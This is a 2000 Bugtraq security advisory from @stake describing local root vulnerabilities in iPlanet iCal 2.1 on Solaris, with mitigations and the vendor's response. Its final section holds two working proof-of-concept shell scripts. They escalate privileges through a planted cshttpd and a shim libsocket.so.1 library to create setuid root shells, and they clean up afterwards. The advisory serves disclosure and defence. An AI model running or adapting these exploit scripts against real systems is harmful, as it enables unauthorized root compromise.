From advisories@ATSTAKE.COM Thu Oct 19 11:27:43 2000 From: "@stake Advisories" To: BUGTRAQ@SECURITYFOCUS.COM Date: Tue, 17 Oct 2000 11:04:30 -0400 Subject: [BUGTRAQ] CORRECTION: @stake Advisory: Multiple Vulnerabilities in iCal 2.1 (A100900-1) [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 In the Detailed Description section of this advisory we inadvertantly specified 'xhost -' as the problematic command that the iCal install script executes. The command it actually executes is 'xhost +'. The advisory below contains this correction. We would like to thank Eric Sherrill [sherrill@ti.com] for bringing this to our attention. @stake, Inc. www.atstake.com Security Advisory Advisory Name: Multiple Vulnerabilities in iCal 2.1 Release Date: 10/09/2000 (Corrected 10/17/2000) Application: iPlanet's iCal version 2.1 Patch 2 Platform: Solaris 2.6 Severity: Local attacker can obtain root access Author: Silicosis [silicosis@atstake.com] Vendor Status: Vendor has patch available Web: www.atstake.com/research/advisories/2000/a100900.txt Executive Summary: iPlanet's iCal, a multiplatform calendaring server, introduces a number of vulnerabilities to the system in which it is installed on. These vulnerabilities, ranging from poor file permissions to insecure programming practices allow local attackers to obtain root access, and remote attackers to monitor keystrokes. Overview: During the software installation process, two of the vulnerabilities are introduced to the system. The first vulnerability, involves removing any access control mechanisms placed on the server's X-server. The second involves poor file permissions on the installed software, allowing local users to modify or replace shell scripts that will be executed by the root user. Two more vulnerabilities exists in a suid-root binary, 'csstart' that is executed upon startup. Due to insecure programming practices, it is possible for a local user to elevate their privileges, and then use this access to obtain root privileges. Detailed Description: The first vulnerability, involves using a GUI to install the iCal software, which is the default method. Although a second method exists, a command line only method which prevents this vulnerability, it is not mentioned in the documentation contained within the distribution tarfile. When performing an installation using a GUI, the setup script executes 'xhost +' on the system, which removes all access control to the system's X server. Without access control in place, external attackers can then connect to the X server and monitor keystrokes and obtain screen images using common, publicly available, tools. This vulnerability can be avoided by executing the installation script with the '-nodisplay' option. The second vulnerability involves installed files that contain poor file permissions. After installation, a total of 289 files exist with world-writable permission. Of these world writable files, the following is executed by root during system boot-up and shutdown: -rwxrwxrwx 1 icsuser icsgroup /opt/SUNWicsrv/cal/bin/iplncal.sh On Solaris, /etc/rc3.d/S94sunwicsrv executes /etc/iplncal.sh, a symlink pointing to /opt/SUNWicsrv/cal/bin/iplncal.sh. Due to the world-writable file permissions, normal users on the system have access to modify this file and insert or delete commands that will be executed by root every time the system is started or stopped. In order to prevent users from modifying this file, administrators should first remove the world-writable bit, and change the ownership of the file to root. Administrators should also change the ownership of the '/opt/SUNWicsrv/cal/bin' directory to root to protect against this attack when used in conjunction with the next vulnerability. The third vulnerability involves a suid-root binary that is also used in the startup/shutdown process. The file, /opt/SUNWicsrv/cal/bin/csstart, contains a programming flaw that enables local users to execute commands as the "icsuser" user. Although the file is suid-root, the program drops its user-id to "icsuser" before we exploit the flaw. The flaw revolves around the fact that the program blindly executes the "cshttpd" web daemon out of the current directory. To exploit this, simply create a shell script called 'cshttpd' in your current directory and execute the csstart program. Any commands placed in this script will be executed with the icsusers' effective user-id. By compromising the icsuser we can now create and modify files within the iCal installation directories. Using this access we can compromise the root user. Running the csstart program as root, and trussing it, we note the forth vulnerability; one of the first things the program tries to do as root is to open a number of libraries in a number of places, if it cannot find the libraries it fails over and uses the system libraries: 7703: open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT 7703: open("../lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT 7703: open("/usr/lib/libsocket.so.1", O_RDONLY) = 4 7703: open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT 7703: open("../lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT 7703: open("/usr/lib/libnsl.so.1", O_RDONLY) = 4 Because the default permissions on the installation directories have everything owned by the icsuser, we can place a shim library that will be loaded before the real library. This shim library will contain modified functions which will execute commands of our choice, as root, the next time the daemon is started. Proof of concept tools have been created to do just this, and are provided below. Interim Solutions: In order to protect against the first vulnerability, install the iCal service using the command-line only method. This involves running the installation script with the '-nodisplay' argument. If iCal was already installed on a system that is running an X-server, Administrators should check the status of the access control mechanisms by running the "xhost" command. Access control should be enabled, not disabled. More information about the '-nodisplay' argument can be found within the online documentation at http://www.iPlanet.com. To protect against the second and third vulnerabilities, Administrators are advised to change the ownership of the /opt/SUNWicsrv/cal/bin/ directory to that of root. Administrators should also change the ownership of any file that will be executed as root during the startup or shutdown process. Vendor Response: We contacted Netscape via email and they were very responsive to our findings. The following is a description of how they have fixed the problems. Netscape: iPlanet Calendar Server (iCS) Support greatly appreciates these issues being brought to our attention. We are happy to report that these issues do not occur in our impending release of the iPlanet Calendar Server 5.0 product. For the iCS 2.1 product, an immediate Hotfix is available through the iPlanet Support Channel and will be bundled with the iCS 2.1 Patch-04 Release. Because of the Web Based Architecture for the iPlanet Calendar Server, the exposure to existing customers appear to be minimal through the design of limited HTTP access to the server, or common network security practices. iPlanet Calendar Server users are not granted login access to the Server Host by default, and login access to the Server Host would be required to exploit any of these potential issues. Specific Issues: 1. X Server access control disabled during install. The install process has been changed so that the system will post a message about utilizing the '-nodisplay' flag rather than attempting to gain access to the X Server directly. 2. Poor File Permissions. Unfortunately, a number of text data files were installed with world-writeable permissions. While they do not pose a functional threat, they have been secured to prevent tampering. The file permissions and ownership have been set accordingly. The permissions on the shell script file iplncal.sh have been changed to prevent unprivileged user access, should the user gain login shell access to the iPlanet Calendar Server. 3. Set uid root binary, csstart, behavior. The csstart program has been revised to explicitly execute the iPlanet Calendar Server cshttpd daemon. Further security measures were also added to enforce that the correct iPlanet Calendar Server Libraries are utilized rather than possible user substituted routines. These changes along with the packaged file ownership and permission changes make a stronger csstart and cshttpd, secured against the concerns expressed. Proof of Concept Tools: There are two scripts below, the first obtains an icsuser shell. The second script is used to obtain root access the next time iCal is stopped or started. The second script should be run once you've obtained the shell and have become the icsuser. This second script creates a shim libsocket.so.1 library with a modified socket() function that then executes a shell script as root. [begin: obtain-ics.sh] #!/bin/sh # # Simple proof of concept exploit used to obtain icsuser shell. # # -sili@atstake.com # INSTDIR=`cat /etc/iplncal.conf` cat > cshttpd << FOOFOO #!/bin/sh cp /usr/bin/ksh ./icsuser chmod 4755 ./icsuser FOOFOO chmod 755 ./cshttpd echo "Executing csstart...." $INSTDIR/cal/bin/csstart -v -p 1 -a 2 2>/dev/null sleep 1 ls -al ./icsuser [end: obtain-ics.sh] [begin: obtain-root.sh] #!/bin/sh # # Simple iCal exploit. Become icsuser by running the shell created with # the # obtain-ics.sh script, and then run this shell script. The next time that # the # service is started by root (ie. system reboot), a root owned suid shell # will # be created: /tmp/r00tshell. # # -sili@atstake.com # INSTDIR=`cat /etc/iplncal.conf` ####### #Create the shim library.. cat > libsushi.c << FOEFOE /* libsushi compile: gcc -shared -nostartfiles -nostdlib -fPIC -o libsushi libsushi.c */ #include int socket(void) { setuid(0); execl("./icalroot","icalroot",0); return 0; } FOEFOE ##### #create the shell script we'll be executing as root.. cat > $INSTDIR/cal/bin/icalroot << FOOFOO #!/bin/sh cp /usr/bin/ksh /tmp/r00tshell chmod 4755 /tmp/r00tshell rm $INSTDIR/cal/bin/icalroot rm $INSTDIR/cal/bin/libsocket.so.1 FOOFOO ##### #make sure script is executable; compile library & put in place.. chmod 755 $INSTDIR/cal/bin/icalroot gcc -shared -nostartfiles -nostdlib -fPIC -o libsushi libsushi.c cp ./libsushi $INSTDIR/cal/bin/libsocket.so.1 sleep 1 ls -l $INSTDIR/cal/bin/libsocket.so.1 ls -l $INSTDIR/cal/bin/icalroot echo ".. Now wait for the iCal service to start up again" [end: obtain-root.sh] For more advisories: http://www.atstake.com/research/advisories/ PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2000 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 7.0 iQA/AwUBOexpJFESXwDtLdMhEQIQNQCfdSgWRdvYs2Ytg/qL34jEboIWRKoAoLF3 l3KTOaZAS8qFZS9VJWmayEif =Jb+C -----END PGP SIGNATURE-----